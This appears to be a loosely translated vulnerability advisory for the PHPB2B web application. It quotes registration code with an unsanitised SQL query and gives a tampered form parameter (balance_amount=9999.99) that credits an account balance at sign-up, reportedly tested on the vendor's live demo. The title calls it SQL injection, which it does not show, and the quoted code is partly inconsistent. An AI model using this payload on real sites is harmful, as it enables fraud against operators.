PHPB2B latest SQL Injection unlimited recharge (Official Website demo successful)
Rt
Detailed description:
See the registered user
if(isset($_POST['register'])){
$is_company = false;
$if_need_check = false;
$register_type = trim($_POST['register']);
$register_typename = trim($_POST['typename']);
pb_submit_check('data');
$default_membergroupid_res = $pdb->GetRow("SELECT * FROM {$tb_prefix}membertypes WHERE name='".$register_typename."'");
$default_membergroupid = $default_membergroupid_res['default_membergroup_id'];
if(empty($default_membergroupid)) $default_membergroupid = $membergroup->field("id","is_default=1");
if ($default_membergroupid_res['id']>1) {
$is_company = true;
}
$member->setParams();
$memberfield->setParams();
$member->params['data']['member']['membergroup_id'] = $default_membergroupid;
$time_limits = $pdb->GetOne("SELECT default_live_time FROM {$tb_prefix}membergroups WHERE id={$default_membergroupid}");
$member->params['data']['member']['service_start_date'] = $time_stamp;
$member->params['data']['member']['service_end_date'] = $membergroup->getServiceEndtime($time_limits);
$member->params['data']['member']['membertype_id'] = ($is_company)?2:1;
if($member_reg_auth=="1" || $member_reg_auth!=0 || !empty($G['setting']['new_userauth'])){
$member->params['data']['member']['status'] = 0;
$if_need_check = true;
}else{
$member->params['data']['member']['status'] = 1;
}
$updated = false;
$updated = $member->Add();
Add
function Add()
{
global $_PB_CACHE, $memberfield, $phpb2b_auth_key, $if_need_check;
$error_msg = array();
if (empty($this->params['data']['member']['username']) or
empty($this->params['data']['member']['userpass']) or
empty($this->params['data']['member']['email'])) return false;
$space_name = $this->params['data']['member']['username'];
$userpass = $this->params['data']['member']['userpass'];
$this->params['data']['member']['userpass'] = $this->authPasswd($this->params['data']['member']['userpass']);
if(empty($this->params['data']['member']['space_name']))
$this->params['data']['member']['space_name'] = PbController::toAlphabets($space_name);//Todo:
$uip = pb_ip2long(pb_getenv('REMOTE_ADDR'));
if(empty($uip)){
pheader("location:".URL."redirect.php?message=".urlencode(L('sys_error')));
}
$this->params['data']['member']['last_login'] = $this->params['data']['member']['created'] = $this->params['data']['member']['modified'] = $this->timestamp;
$this->params['data']['member']['last_ip'] = pb_get_client_ip('str');
$email_exists = $this->checkUserExistsByEmail($this->params['data']['member']['email']);
if ($email_exists) {
flash("email_exists", null, 0);
}
$if_exists = $this->checkUserExist($this->params['data']['member']['username']);
if ($if_exists) {
flash('member_has_exists', null, 0);
}else{
$this->save($this->params['data']['member']);
The save Function performs foreach for our post data.
function save($obj_name, $obj_id, $data)
{
if (empty($data)) {
return false;
}
foreach ($data as $key=>$val) {
if (in_array($key, array('title', 'keyword', 'description'))) {
$this->add($obj_id, $obj_name, $key, $val);
}
Tested on the official website
When we register a user. Capture packets and add Parameters
data%5Bmember%5D%5Bbalance_amount%5D=9999.99
Recharge your account ..
Proof of vulnerability:
Solution:
You are more professional